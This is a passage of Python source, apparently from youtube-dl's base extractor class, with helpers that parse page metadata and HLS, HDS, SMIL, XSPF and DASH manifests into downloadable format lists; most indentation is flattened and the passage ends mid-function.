def _dc_search_uploader(self, html):
return self._html_search_meta('dc.creator', html, 'uploader')
def _rta_search(self, html):
# See http://www.rtalabel.org/index.php?content=howtofaq#single
if re.search(r'(?ix)<meta\s+name="rating"\s+'
r' content="RTA-5042-1996-1400-1577-RTA"',
html):
return 18
return 0
def _media_rating_search(self, html):
# See http://www.tjg-designs.com/WP/metadata-code-examples-adding-metadata-to-your-web-pages/
rating = self._html_search_meta('rating', html)
if not rating:
return None
RATING_TABLE = {
'safe for kids': 0,
'general': 8,
'14 years': 14,
'mature': 17,
'restricted': 19,
}
return RATING_TABLE.get(rating.lower())
def _family_friendly_search(self, html):
# See http://schema.org/VideoObject
family_friendly = self._html_search_meta('isFamilyFriendly', html)
if not family_friendly:
return None
RATING_TABLE = {
'1': 0,
'true': 0,
'0': 18,
'false': 18,
}
return RATING_TABLE.get(family_friendly.lower())
def _twitter_search_player(self, html):
return self._html_search_meta('twitter:player', html,
'twitter card player')
def _search_json_ld(self, html, video_id, expected_type=None, **kwargs):
json_ld = self._search_regex(
r'(?s)<script[^>]+type=(["\'])application/ld\+json\1[^>]*>(?P<json_ld>.+?)</script>',
html, 'JSON-LD', group='json_ld', **kwargs)
default = kwargs.get('default', NO_DEFAULT)
if not json_ld:
return default if default is not NO_DEFAULT else {}
# JSON-LD may be malformed and thus `fatal` should be respected.
# At the same time `default` may be passed that assumes `fatal=False`
# for _search_regex. Let's simulate the same behavior here as well.
fatal = kwargs.get('fatal', True) if default == NO_DEFAULT else False
return self._json_ld(json_ld, video_id, fatal=fatal, expected_type=expected_type)
def _json_ld(self, json_ld, video_id, fatal=True, expected_type=None):
if isinstance(json_ld, compat_str):
json_ld = self._parse_json(json_ld, video_id, fatal=fatal)
if not json_ld:
return {}
info = {}
if not isinstance(json_ld, (list, tuple, dict)):
return info
if isinstance(json_ld, dict):
json_ld = [json_ld]
for e in json_ld:
if e.get('@context') == 'http://schema.org':
item_type = e.get('@type')
if expected_type is not None and expected_type != item_type:
return info
if item_type == 'TVEpisode':
info.update({
'episode': unescapeHTML(e.get('name')),
'episode_number': int_or_none(e.get('episodeNumber')),
'description': unescapeHTML(e.get('description')),
})
part_of_season = e.get('partOfSeason')
if isinstance(part_of_season, dict) and part_of_season.get('@type') == 'TVSeason':
info['season_number'] = int_or_none(part_of_season.get('seasonNumber'))
part_of_series = e.get('partOfSeries') or e.get('partOfTVSeries')
if isinstance(part_of_series, dict) and part_of_series.get('@type') == 'TVSeries':
info['series'] = unescapeHTML(part_of_series.get('name'))
elif item_type == 'Article':
info.update({
'timestamp': parse_iso8601(e.get('datePublished')),
'title': unescapeHTML(e.get('headline')),
'description': unescapeHTML(e.get('articleBody')),
})
elif item_type == 'VideoObject':
info.update({
'url': e.get('contentUrl'),
'title': unescapeHTML(e.get('name')),
'description': unescapeHTML(e.get('description')),
'thumbnail': e.get('thumbnailUrl') or e.get('thumbnailURL'),
'duration': parse_duration(e.get('duration')),
'timestamp': unified_timestamp(e.get('uploadDate')),
'filesize': float_or_none(e.get('contentSize')),
'tbr': int_or_none(e.get('bitrate')),
'width': int_or_none(e.get('width')),
'height': int_or_none(e.get('height')),
})
break
return dict((k, v) for k, v in info.items() if v is not None)
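
    # Sketch: a page embedding
    #     <script type="application/ld+json">
    #     {"@context": "http://schema.org", "@type": "VideoObject",
    #      "name": "Example", "uploadDate": "2017-01-01T00:00:00Z"}
    #     </script>
    # would yield {'title': 'Example', 'timestamp': 1483228800} here
    # (fields with None values are dropped by the final dict() filter).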
@staticmethod
def _hidden_inputs(html):
html = re.sub(r'<!--(?:(?!<!--).)*-->', '', html)
hidden_inputs = {}
for input in re.findall(r'(?i)(<input[^>]+>)', html):
attrs = extract_attributes(input)
            if not attrs:
                continue
if attrs.get('type') not in ('hidden', 'submit'):
continue
name = attrs.get('name') or attrs.get('id')
value = attrs.get('value')
if name and value is not None:
hidden_inputs[name] = value
return hidden_inputs
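
    # e.g. '<input type="hidden" name="csrf" value="abc">' contributes
    # {'csrf': 'abc'} above; inputs whose type is neither hidden nor submit
    # are ignored.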
def _form_hidden_inputs(self, form_id, html):
form = self._search_regex(
r'(?is)<form[^>]+?id=(["\'])%s\1[^>]*>(?P<form>.+?)</form>' % form_id,
html, '%s form' % form_id, group='form')
return self._hidden_inputs(form)
def _sort_formats(self, formats, field_preference=None):
if not formats:
raise ExtractorError('No video formats found')
for f in formats:
# Automatically determine tbr when missing based on abr and vbr (improves
# formats sorting in some cases)
if 'tbr' not in f and f.get('abr') is not None and f.get('vbr') is not None:
f['tbr'] = f['abr'] + f['vbr']
def _formats_key(f):
# TODO remove the following workaround
from ..utils import determine_ext
if not f.get('ext') and 'url' in f:
f['ext'] = determine_ext(f['url'])
if isinstance(field_preference, (list, tuple)):
return tuple(
f.get(field)
if f.get(field) is not None
else ('' if field == 'format_id' else -1)
for field in field_preference)
preference = f.get('preference')
if preference is None:
preference = 0
if f.get('ext') in ['f4f', 'f4m']: # Not yet supported
preference -= 0.5
protocol = f.get('protocol') or determine_protocol(f)
proto_preference = 0 if protocol in ['http', 'https'] else (-0.5 if protocol == 'rtsp' else -0.1)
if f.get('vcodec') == 'none': # audio only
preference -= 50
if self._downloader.params.get('prefer_free_formats'):
ORDER = ['aac', 'mp3', 'm4a', 'webm', 'ogg', 'opus']
else:
ORDER = ['webm', 'opus', 'ogg', 'mp3', 'aac', 'm4a']
ext_preference = 0
try:
audio_ext_preference = ORDER.index(f['ext'])
except ValueError:
audio_ext_preference = -1
else:
if f.get('acodec') == 'none': # video only
preference -= 40
if self._downloader.params.get('prefer_free_formats'):
ORDER = ['flv', 'mp4', 'webm']
else:
ORDER = ['webm', 'flv', 'mp4']
try:
ext_preference = ORDER.index(f['ext'])
except ValueError:
ext_preference = -1
audio_ext_preference = 0
return (
preference,
f.get('language_preference') if f.get('language_preference') is not None else -1,
f.get('quality') if f.get('quality') is not None else -1,
f.get('tbr') if f.get('tbr') is not None else -1,
f.get('filesize') if f.get('filesize') is not None else -1,
f.get('vbr') if f.get('vbr') is not None else -1,
f.get('height') if f.get('height') is not None else -1,
f.get('width') if f.get('width') is not None else -1,
proto_preference,
ext_preference,
f.get('abr') if f.get('abr') is not None else -1,
audio_ext_preference,
f.get('fps') if f.get('fps') is not None else -1,
f.get('filesize_approx') if f.get('filesize_approx') is not None else -1,
f.get('source_preference') if f.get('source_preference') is not None else -1,
f.get('format_id') if f.get('format_id') is not None else '',
)
formats.sort(key=_formats_key)
def _check_formats(self, formats, video_id):
if formats:
formats[:] = filter(
lambda f: self._is_valid_url(
f['url'], video_id,
item='%s video format' % f.get('format_id') if f.get('format_id') else 'video'),
formats)
@staticmethod
def _remove_duplicate_formats(formats):
format_urls = set()
unique_formats = []
for f in formats:
if f['url'] not in format_urls:
format_urls.add(f['url'])
unique_formats.append(f)
formats[:] = unique_formats
def _is_valid_url(self, url, video_id, item='video', headers={}):
url = self._proto_relative_url(url, scheme='http:')
        # For now, assume non-HTTP(S) URLs are always valid
if not (url.startswith('http://') or url.startswith('https://')):
return True
try:
self._request_webpage(url, video_id, 'Checking %s URL' % item, headers=headers)
return True
except ExtractorError as e:
if isinstance(e.cause, compat_urllib_error.URLError):
self.to_screen(
'%s: %s URL is invalid, skipping' % (video_id, item))
return False
raise
def http_scheme(self):
""" Either "http:" or "https:", depending on the user's preferences """
return (
'http:'
if self._downloader.params.get('prefer_insecure', False)
else 'https:')
def _proto_relative_url(self, url, scheme=None):
if url is None:
return url
if url.startswith('//'):
if scheme is None:
scheme = self.http_scheme()
return scheme + url
else:
return url
def _sleep(self, timeout, video_id, msg_template=None):
if msg_template is None:
msg_template = '%(video_id)s: Waiting for %(timeout)s seconds'
msg = msg_template % {'video_id': video_id, 'timeout': timeout}
self.to_screen(msg)
time.sleep(timeout)
def _extract_f4m_formats(self, manifest_url, video_id, preference=None, f4m_id=None,
transform_source=lambda s: fix_xml_ampersands(s).strip(),
fatal=True, m3u8_id=None):
manifest = self._download_xml(
manifest_url, video_id, 'Downloading f4m manifest',
'Unable to download f4m manifest',
# Some manifests may be malformed, e.g. prosiebensat1 generated manifests
# (see https://github.com/rg3/youtube-dl/issues/6215#issuecomment-121704244)
transform_source=transform_source,
fatal=fatal)
if manifest is False:
return []
return self._parse_f4m_formats(
manifest, manifest_url, video_id, preference=preference, f4m_id=f4m_id,
transform_source=transform_source, fatal=fatal, m3u8_id=m3u8_id)
def _parse_f4m_formats(self, manifest, manifest_url, video_id, preference=None, f4m_id=None,
transform_source=lambda s: fix_xml_ampersands(s).strip(),
fatal=True, m3u8_id=None):
# currently youtube-dl cannot decode the playerVerificationChallenge as Akamai uses Adobe Alchemy
akamai_pv = manifest.find('{http://ns.adobe.com/f4m/1.0}pv-2.0')
if akamai_pv is not None and ';' in akamai_pv.text:
playerVerificationChallenge = akamai_pv.text.split(';')[0]
if playerVerificationChallenge.strip() != '':
return []
formats = []
manifest_version = '1.0'
media_nodes = manifest.findall('{http://ns.adobe.com/f4m/1.0}media')
if not media_nodes:
manifest_version = '2.0'
media_nodes = manifest.findall('{http://ns.adobe.com/f4m/2.0}media')
# Remove unsupported DRM protected media from final formats
# rendition (see https://github.com/rg3/youtube-dl/issues/8573).
media_nodes = remove_encrypted_media(media_nodes)
if not media_nodes:
return formats
base_url = xpath_text(
manifest, ['{http://ns.adobe.com/f4m/1.0}baseURL', '{http://ns.adobe.com/f4m/2.0}baseURL'],
'base URL', default=None)
if base_url:
base_url = base_url.strip()
bootstrap_info = xpath_element(
manifest, ['{http://ns.adobe.com/f4m/1.0}bootstrapInfo', '{http://ns.adobe.com/f4m/2.0}bootstrapInfo'],
'bootstrap info', default=None)
vcodec = None
mime_type = xpath_text(
manifest, ['{http://ns.adobe.com/f4m/1.0}mimeType', '{http://ns.adobe.com/f4m/2.0}mimeType'],
            'mime type', default=None)
if mime_type and mime_type.startswith('audio/'):
vcodec = 'none'
for i, media_el in enumerate(media_nodes):
tbr = int_or_none(media_el.attrib.get('bitrate'))
width = int_or_none(media_el.attrib.get('width'))
height = int_or_none(media_el.attrib.get('height'))
format_id = '-'.join(filter(None, [f4m_id, compat_str(i if tbr is None else tbr)]))
# If <bootstrapInfo> is present, the specified f4m is a
# stream-level manifest, and only set-level manifests may refer to
# external resources. See section 11.4 and section 4 of F4M spec
if bootstrap_info is None:
media_url = None
# @href is introduced in 2.0, see section 11.6 of F4M spec
if manifest_version == '2.0':
media_url = media_el.attrib.get('href')
if media_url is None:
media_url = media_el.attrib.get('url')
if not media_url:
continue
manifest_url = (
media_url if media_url.startswith('http://') or media_url.startswith('https://')
else ((base_url or '/'.join(manifest_url.split('/')[:-1])) + '/' + media_url))
            # If media_url is itself an f4m manifest, extract it recursively,
            # since bitrates in the parent manifest (this one) and in the
            # media_url manifest may differ, making it impossible for the f4m
            # downloader to resolve the format by the requested bitrate
ext = determine_ext(manifest_url)
if ext == 'f4m':
f4m_formats = self._extract_f4m_formats(
manifest_url, video_id, preference=preference, f4m_id=f4m_id,
transform_source=transform_source, fatal=fatal)
# Sometimes stream-level manifest contains single media entry that
# does not contain any quality metadata (e.g. http://matchtv.ru/#live-player).
# At the same time parent's media entry in set-level manifest may
# contain it. We will copy it from parent in such cases.
if len(f4m_formats) == 1:
f = f4m_formats[0]
f.update({
'tbr': f.get('tbr') or tbr,
'width': f.get('width') or width,
'height': f.get('height') or height,
'format_id': f.get('format_id') if not tbr else format_id,
'vcodec': vcodec,
})
formats.extend(f4m_formats)
continue
elif ext == 'm3u8':
formats.extend(self._extract_m3u8_formats(
manifest_url, video_id, 'mp4', preference=preference,
m3u8_id=m3u8_id, fatal=fatal))
continue
formats.append({
'format_id': format_id,
'url': manifest_url,
'manifest_url': manifest_url,
'ext': 'flv' if bootstrap_info is not None else None,
'tbr': tbr,
'width': width,
'height': height,
'vcodec': vcodec,
'preference': preference,
})
return formats
def _m3u8_meta_format(self, m3u8_url, ext=None, preference=None, m3u8_id=None):
return {
'format_id': '-'.join(filter(None, [m3u8_id, 'meta'])),
'url': m3u8_url,
'ext': ext,
'protocol': 'm3u8',
'preference': preference - 100 if preference else -100,
'resolution': 'multiple',
'format_note': 'Quality selection URL',
}
def _extract_m3u8_formats(self, m3u8_url, video_id, ext=None,
entry_protocol='m3u8', preference=None,
m3u8_id=None, note=None, errnote=None,
fatal=True, live=False):
res = self._download_webpage_handle(
m3u8_url, video_id,
note=note or 'Downloading m3u8 information',
errnote=errnote or 'Failed to download m3u8 information',
fatal=fatal)
if res is False:
return []
m3u8_doc, urlh = res
m3u8_url = urlh.geturl()
if '#EXT-X-FAXS-CM:' in m3u8_doc: # Adobe Flash Access
return []
formats = [self._m3u8_meta_format(m3u8_url, ext, preference, m3u8_id)]
format_url = lambda u: (
u
if re.match(r'^https?://', u)
else compat_urlparse.urljoin(m3u8_url, u))
# We should try extracting formats only from master playlists [1], i.e.
# playlists that describe available qualities. On the other hand media
# playlists [2] should be returned as is since they contain just the media
        # without quality renditions.
# Fortunately, master playlist can be easily distinguished from media
# playlist based on particular tags availability. As of [1, 2] master
        # playlist tags MUST NOT appear in a media playlist and vice versa.
# As of [3] #EXT-X-TARGETDURATION tag is REQUIRED for every media playlist
# and MUST NOT appear in master playlist thus we can clearly detect media
# playlist with this criterion.
# 1. https://tools.ietf.org/html/draft-pantos-http-live-streaming-17#section-4.3.4
# 2. https://tools.ietf.org/html/draft-pantos-http-live-streaming-17#section-4.3.3
# 3. https://tools.ietf.org/html/draft-pantos-http-live-streaming-17#section-4.3.3.1
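        # For instance (illustrative snippet, not taken from any real stream),
        # a media playlist looks like:
        #   #EXTM3U
        #   #EXT-X-TARGETDURATION:10
        #   #EXTINF:9.009,
        #   segment0.ts
        # whereas a master playlist lists #EXT-X-STREAM-INF variant entries.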
if '#EXT-X-TARGETDURATION' in m3u8_doc: # media playlist, return as is
return [{
'url': m3u8_url,
'format_id': m3u8_id,
'ext': ext,
'protocol': entry_protocol,
'preference': preference,
}]
audio_in_video_stream = {}
last_info = {}
last_media = {}
for line in m3u8_doc.splitlines():
if line.startswith('#EXT-X-STREAM-INF:'):
last_info = parse_m3u8_attributes(line)
elif line.startswith('#EXT-X-MEDIA:'):
media = parse_m3u8_attributes(line)
media_type = media.get('TYPE')
if media_type in ('VIDEO', 'AUDIO'):
group_id = media.get('GROUP-ID')
media_url = media.get('URI')
if media_url:
format_id = []
for v in (group_id, media.get('NAME')):
if v:
format_id.append(v)
f = {
'format_id': '-'.join(format_id),
'url': format_url(media_url),
'language': media.get('LANGUAGE'),
'ext': ext,
'protocol': entry_protocol,
'preference': preference,
}
if media_type == 'AUDIO':
f['vcodec'] = 'none'
if group_id and not audio_in_video_stream.get(group_id):
audio_in_video_stream[group_id] = False
formats.append(f)
else:
# When there is no URI in EXT-X-MEDIA let this tag's
# data be used by regular URI lines below
last_media = media
if media_type == 'AUDIO' and group_id:
audio_in_video_stream[group_id] = True
elif line.startswith('#') or not line.strip():
continue
else:
tbr = int_or_none(last_info.get('AVERAGE-BANDWIDTH') or last_info.get('BANDWIDTH'), scale=1000)
format_id = []
if m3u8_id:
format_id.append(m3u8_id)
                # Although the specification does not mention the NAME
                # attribute for EXT-X-STREAM-INF, it may still be present
stream_name = last_info.get('NAME') or last_media.get('NAME')
# Bandwidth of live streams may differ over time thus making
# format_id unpredictable. So it's better to keep provided
# format_id intact.
if not live:
format_id.append(stream_name if stream_name else '%d' % (tbr if tbr else len(formats)))
manifest_url = format_url(line.strip())
f = {
'format_id': '-'.join(format_id),
'url': manifest_url,
'manifest_url': manifest_url,
'tbr': tbr,
'ext': ext,
'fps': float_or_none(last_info.get('FRAME-RATE')),
'protocol': entry_protocol,
'preference': preference,
}
resolution = last_info.get('RESOLUTION')
if resolution:
mobj = re.search(r'(?P<width>\d+)[xX](?P<height>\d+)', resolution)
if mobj:
f['width'] = int(mobj.group('width'))
f['height'] = int(mobj.group('height'))
# Unified Streaming Platform
mobj = re.search(
r'audio.*?(?:%3D|=)(\d+)(?:-video.*?(?:%3D|=)(\d+))?', f['url'])
if mobj:
abr, vbr = mobj.groups()
abr, vbr = float_or_none(abr, 1000), float_or_none(vbr, 1000)
f.update({
'vbr': vbr,
'abr': abr,
})
f.update(parse_codecs(last_info.get('CODECS')))
if audio_in_video_stream.get(last_info.get('AUDIO')) is False and f['vcodec'] != 'none':
# TODO: update acodec for audio only formats with the same GROUP-ID
f['acodec'] = 'none'
formats.append(f)
last_info = {}
last_media = {}
return formats
@staticmethod
def _xpath_ns(path, namespace=None):
if not namespace:
return path
out = []
for c in path.split('/'):
if not c or c == '.':
out.append(c)
else:
out.append('{%s}%s' % (namespace, c))
return '/'.join(out)
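    # Example (illustrative): _xpath_ns('./head/meta', 'urn:example') expands to
    # './{urn:example}head/{urn:example}meta', the Clark notation ElementTree expects.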
def _extract_smil_formats(self, smil_url, video_id, fatal=True, f4m_params=None, transform_source=None):
smil = self._download_smil(smil_url, video_id, fatal=fatal, transform_source=transform_source)
if smil is False:
assert not fatal
return []
namespace = self._parse_smil_namespace(smil)
return self._parse_smil_formats(
smil, smil_url, video_id, namespace=namespace, f4m_params=f4m_params)
def _extract_smil_info(self, smil_url, video_id, fatal=True, f4m_params=None):
smil = self._download_smil(smil_url, video_id, fatal=fatal)
if smil is False:
return {}
return self._parse_smil(smil, smil_url, video_id, f4m_params=f4m_params)
def _download_smil(self, smil_url, video_id, fatal=True, transform_source=None):
return self._download_xml(
smil_url, video_id, 'Downloading SMIL file',
'Unable to download SMIL file', fatal=fatal, transform_source=transform_source)
def _parse_smil(self, smil, smil_url, video_id, f4m_params=None):
namespace = self._parse_smil_namespace(smil)
formats = self._parse_smil_formats(
smil, smil_url, video_id, namespace=namespace, f4m_params=f4m_params)
subtitles = self._parse_smil_subtitles(smil, namespace=namespace)
video_id = os.path.splitext(url_basename(smil_url))[0]
title = None
description = None
upload_date = None
for meta in smil.findall(self._xpath_ns('./head/meta', namespace)):
name = meta.attrib.get('name')
content = meta.attrib.get('content')
if not name or not content:
continue
if not title and name == 'title':
title = content
elif not description and name in ('description', 'abstract'):
description = content
elif not upload_date and name == 'date':
upload_date = unified_strdate(content)
thumbnails = [{
'id': image.get('type'),
'url': image.get('src'),
'width': int_or_none(image.get('width')),
'height': int_or_none(image.get('height')),
} for image in smil.findall(self._xpath_ns('.//image', namespace)) if image.get('src')]
return {
'id': video_id,
'title': title or video_id,
'description': description,
'upload_date': upload_date,
'thumbnails': thumbnails,
'formats': formats,
'subtitles': subtitles,
}
def _parse_smil_namespace(self, smil):
return self._search_regex(
r'(?i)^{([^}]+)?}smil$', smil.tag, 'namespace', default=None)
def _parse_smil_formats(self, smil, smil_url, video_id, namespace=None, f4m_params=None, transform_rtmp_url=None):
base = smil_url
for meta in smil.findall(self._xpath_ns('./head/meta', namespace)):
b = meta.get('base') or meta.get('httpBase')
if b:
base = b
break
formats = []
rtmp_count = 0
http_count = 0
m3u8_count = 0
srcs = []
media = smil.findall(self._xpath_ns('.//video', namespace)) + smil.findall(self._xpath_ns('.//audio', namespace))
for medium in media:
src = medium.get('src')
if not src or src in srcs:
continue
srcs.append(src)
bitrate = float_or_none(medium.get('system-bitrate') or medium.get('systemBitrate'), 1000)
filesize = int_or_none(medium.get('size') or medium.get('fileSize'))
width = int_or_none(medium.get('width'))
height = int_or_none(medium.get('height'))
proto = medium.get('proto')
ext = medium.get('ext')
src_ext = determine_ext(src)
streamer = medium.get('streamer') or base
if proto == 'rtmp' or streamer.startswith('rtmp'):
rtmp_count += 1
formats.append({
'url': streamer,
'play_path': src,
'ext': 'flv',
'format_id': 'rtmp-%d' % (rtmp_count if bitrate is None else bitrate),
'tbr': bitrate,
'filesize': filesize,
'width': width,
'height': height,
})
if transform_rtmp_url:
streamer, src = transform_rtmp_url(streamer, src)
formats[-1].update({
'url': streamer,
'play_path': src,
})
continue
src_url = src if src.startswith('http') else compat_urlparse.urljoin(base, src)
src_url = src_url.strip()
if proto == 'm3u8' or src_ext == 'm3u8':
m3u8_formats = self._extract_m3u8_formats(
src_url, video_id, ext or 'mp4', m3u8_id='hls', fatal=False)
if len(m3u8_formats) == 1:
m3u8_count += 1
m3u8_formats[0].update({
'format_id': 'hls-%d' % (m3u8_count if bitrate is None else bitrate),
'tbr': bitrate,
'width': width,
'height': height,
})
formats.extend(m3u8_formats)
continue
if src_ext == 'f4m':
f4m_url = src_url
if not f4m_params:
f4m_params = {
'hdcore': '3.2.0',
'plugin': 'flowplayer-3.2.0.1',
}
f4m_url += '&' if '?' in f4m_url else '?'
f4m_url += compat_urllib_parse_urlencode(f4m_params)
formats.extend(self._extract_f4m_formats(f4m_url, video_id, f4m_id='hds', fatal=False))
continue
if src_url.startswith('http') and self._is_valid_url(src, video_id):
http_count += 1
formats.append({
'url': src_url,
'ext': ext or src_ext or 'flv',
'format_id': 'http-%d' % (bitrate or http_count),
'tbr': bitrate,
'filesize': filesize,
'width': width,
'height': height,
})
continue
return formats
def _parse_smil_subtitles(self, smil, namespace=None, subtitles_lang='en'):
urls = []
subtitles = {}
for num, textstream in enumerate(smil.findall(self._xpath_ns('.//textstream', namespace))):
src = textstream.get('src')
if not src or src in urls:
continue
urls.append(src)
ext = textstream.get('ext') or mimetype2ext(textstream.get('type')) or determine_ext(src)
lang = textstream.get('systemLanguage') or textstream.get('systemLanguageName') or textstream.get('lang') or subtitles_lang
subtitles.setdefault(lang, []).append({
'url': src,
'ext': ext,
})
return subtitles
def _extract_xspf_playlist(self, playlist_url, playlist_id, fatal=True):
xspf = self._download_xml(
            playlist_url, playlist_id, 'Downloading xspf playlist',
'Unable to download xspf manifest', fatal=fatal)
if xspf is False:
return []
return self._parse_xspf(xspf, playlist_id)
def _parse_xspf(self, playlist, playlist_id):
NS_MAP = {
'xspf': 'http://xspf.org/ns/0/',
's1': 'http://static.streamone.nl/player/ns/0',
}
entries = []
for track in playlist.findall(xpath_with_ns('./xspf:trackList/xspf:track', NS_MAP)):
title = xpath_text(
track, xpath_with_ns('./xspf:title', NS_MAP), 'title', default=playlist_id)
description = xpath_text(
track, xpath_with_ns('./xspf:annotation', NS_MAP), 'description')
thumbnail = xpath_text(
track, xpath_with_ns('./xspf:image', NS_MAP), 'thumbnail')
duration = float_or_none(
xpath_text(track, xpath_with_ns('./xspf:duration', NS_MAP), 'duration'), 1000)
formats = [{
'url': location.text,
'format_id': location.get(xpath_with_ns('s1:label', NS_MAP)),
'width': int_or_none(location.get(xpath_with_ns('s1:width', NS_MAP))),
'height': int_or_none(location.get(xpath_with_ns('s1:height', NS_MAP))),
} for location in track.findall(xpath_with_ns('./xspf:location', NS_MAP))]
self._sort_formats(formats)
entries.append({
'id': playlist_id,
'title': title,
'description': description,
'thumbnail': thumbnail,
'duration': duration,
'formats': formats,
})
return entries
def _extract_mpd_formats(self, mpd_url, video_id, mpd_id=None, note=None, errnote=None, fatal=True, formats_dict={}):
res = self._download_webpage_handle(
mpd_url, video_id,
note=note or 'Downloading MPD manifest',
errnote=errnote or 'Failed to download MPD manifest',
fatal=fatal)
if res is False:
return []
mpd, urlh = res
mpd_base_url = base_url(urlh.geturl())
return self._parse_mpd_formats(
compat_etree_fromstring(mpd.encode('utf-8')), mpd_id, mpd_base_url,
formats_dict=formats_dict, mpd_url=mpd_url)
def _parse_mpd_formats(self, mpd_doc, mpd_id=None, mpd_base_url='', formats_dict={}, mpd_url=None):
"""
Parse formats from MPD manifest.
References:
1. MPEG-DASH Standard, ISO/IEC 23009-1:2014(E),
http://standards.iso.org/ittf/PubliclyAvailableStandards/c065274_ISO_IEC_23009-1_2014.zip
2. https://en.wikipedia.org/wiki/Dynamic_Adaptive_Streaming_over_HTTP
"""
if mpd_doc.get('type') == 'dynamic':
return []
namespace = self._search_regex(r'(?i)^{([^}]+)?}MPD$', mpd_doc.tag, 'namespace', default=None)
def _add_ns(path):
return self._xpath_ns(path, namespace)
def is_drm_protected(element):
return element.find(_add_ns('ContentProtection')) is not None
def extract_multisegment_info(element, ms_parent_info):
ms_info = ms_parent_info.copy()
            # As per [1, 5.3.9.2.2] SegmentList and SegmentTemplate share some
            # common attributes and elements. We will only extract what is
            # relevant for us.
def extract_common(source):
segment_timeline = source.find(_add_ns('SegmentTimeline'))
if segment_timeline is not None:
s_e = segment_timeline.findall(_add_ns('S'))
if s_e:
ms_info['total_number'] = 0
ms_info['s'] = []
for s in s_e:
r = int(s.get('r', 0))
ms_info['total_number'] += 1 + r
ms_info['s'].append({
't': int(s.get('t', 0)),
# @d is mandatory (see [1, 5.3.9.6.2, Table 17, page 60])
'd': int(s.attrib['d']),
'r': r,
})
start_number = source.get('startNumber')
if start_number:
ms_info['start_number'] = int(start_number)
timescale = source.get('timescale')
if timescale:
ms_info['timescale'] = int(timescale)
segment_duration = source.get('duration')
if segment_duration:
ms_info['segment_duration'] = int(segment_duration)
def extract_Initialization(source):
initialization = source.find(_add_ns('Initialization'))
if initialization is not None:
ms_info['initialization_url'] = initialization.attrib['sourceURL']
segment_list = element.find(_add_ns('SegmentList'))
if segment_list is not None:
extract_common(segment_list)
extract_Initialization(segment_list)
segment_urls_e = segment_list.findall(_add_ns('SegmentURL'))
if segment_urls_e:
ms_info['segment_urls'] = [segment.attrib['media'] for segment in segment_urls_e]
else:
segment_template = element.find(_add_ns('SegmentTemplate'))
if segment_template is not None:
extract_common(segment_template)
media = segment_template.get('media')
if media:
ms_info['media'] = media
initialization = segment_template.get('initialization')
if initialization:
ms_info['initialization'] = initialization
else:
extract_Initialization(segment_template)
return ms_info
mpd_duration = parse_duration(mpd_doc.get('mediaPresentationDuration'))
formats = []
for period in mpd_doc.findall(_add_ns('Period')):
period_duration = parse_duration(period.get('duration')) or mpd_duration
period_ms_info = extract_multisegment_info(period, {
'start_number': 1,
'timescale': 1,
})
for adaptation_set in period.findall(_add_ns('AdaptationSet')):
if is_drm_protected(adaptation_set):
continue
adaption_set_ms_info = extract_multisegment_info(adaptation_set, period_ms_info)
for representation in adaptation_set.findall(_add_ns('Representation')):
if is_drm_protected(representation):
continue
representation_attrib = adaptation_set.attrib.copy()
representation_attrib.update(representation.attrib)
# According to [1, 5.3.7.2, Table 9, page 41], @mimeType is mandatory
mime_type = representation_attrib['mimeType']
content_type = mime_type.split('/')[0]
if content_type == 'text':
# TODO implement WebVTT downloading
pass
elif content_type == 'video' or content_type == 'audio':
base_url = ''
for element in (representation, adaptation_set, period, mpd_doc):
base_url_e = element.find(_add_ns('BaseURL'))
if base_url_e is not None:
base_url = base_url_e.text + base_url
if re.match(r'^https?://', base_url):
break
if mpd_base_url and not re.match(r'^https?://', base_url):
if not mpd_base_url.endswith('/') and not base_url.startswith('/'):
mpd_base_url += '/'
base_url = mpd_base_url + base_url
representation_id = representation_attrib.get('id')
lang = representation_attrib.get('lang')
url_el = representation.find(_add_ns('BaseURL'))
filesize = int_or_none(url_el.attrib.get('{http://youtube.com/yt/2012/10/10}contentLength') if url_el is not None else None)
bandwidth = int_or_none(representation_attrib.get('bandwidth'))
f = {
'format_id': '%s-%s' % (mpd_id, representation_id) if mpd_id else representation_id,
'url': base_url,
'manifest_url': mpd_url,
'ext': mimetype2ext(mime_type),
'width': int_or_none(representation_attrib.get('width')),
'height': int_or_none(representation_attrib.get('height')),
'tbr': int_or_none(bandwidth, 1000),
'asr': int_or_none(representation_attrib.get('audioSamplingRate')),
'fps': int_or_none(representation_attrib.get('frameRate')),
'language': lang if lang not in ('mul', 'und', 'zxx', 'mis') else None,
'format_note': 'DASH %s' % content_type,
'filesize': filesize,
}
f.update(parse_codecs(representation_attrib.get('codecs')))
representation_ms_info = extract_multisegment_info(representation, adaption_set_ms_info)
def prepare_template(template_name, identifiers):
t = representation_ms_info[template_name]
t = t.replace('$RepresentationID$', representation_id)
t = re.sub(r'\$(%s)\$' % '|'.join(identifiers), r'%(\1)d', t)
t = re.sub(r'\$(%s)%%([^$]+)\$' % '|'.join(identifiers), r'%(\1)\2', t)
                        t = t.replace('$$', '$')  # str.replace returns a new string, so reassign
return t
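                    # Example (illustrative): with identifiers ('Number', 'Bandwidth', 'Time'),
                    # 'seg-$Number%05d$.m4s' becomes 'seg-%(Number)05d.m4s', which
                    # Python %-formatting then fills: {'Number': 42} -> 'seg-00042.m4s'.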
# @initialization is a regular template like @media one
# so it should be handled just the same way (see
# https://github.com/rg3/youtube-dl/issues/11605)
if 'initialization' in representation_ms_info:
initialization_template = prepare_template(
'initialization',
# As per [1, 5.3.9.4.2, Table 15, page 54] $Number$ and
# $Time$ shall not be included for @initialization thus
# only $Bandwidth$ remains
('Bandwidth', ))
representation_ms_info['initialization_url'] = initialization_template % {
'Bandwidth': bandwidth,
}
if 'segment_urls' not in representation_ms_info and 'media' in representation_ms_info:
media_template = prepare_template('media', ('Number', 'Bandwidth', 'Time'))
# As per [1, 5.3.9.4.4, Table 16, page 55] $Number$ and $Time$
# can't be used at the same time
if '%(Number' in media_template and 's' not in representation_ms_info:
segment_duration = None
                            if 'total_number' not in representation_ms_info and 'segment_duration' in representation_ms_info:
segment_duration = float_or_none(representation_ms_info['segment_duration'], representation_ms_info['timescale'])
representation_ms_info['total_number'] = int(math.ceil(float(period_duration) / segment_duration))
representation_ms_info['fragments'] = [{
'url': media_template % {
'Number': segment_number,
'Bandwidth': bandwidth,
},
'duration': segment_duration,
} for segment_number in range(
representation_ms_info['start_number'],
representation_ms_info['total_number'] + representation_ms_info['start_number'])]
else:
# $Number*$ or $Time$ in media template with S list available
# Example $Number*$: http://www.svtplay.se/klipp/9023742/stopptid-om-bjorn-borg
# Example $Time$: https://play.arkena.com/embed/avp/v2/player/media/b41dda37-d8e7-4d3f-b1b5-9a9db578bdfe/1/129411
representation_ms_info['fragments'] = []
segment_time = 0
segment_d = None
segment_number = representation_ms_info['start_number']
def add_segment_url():
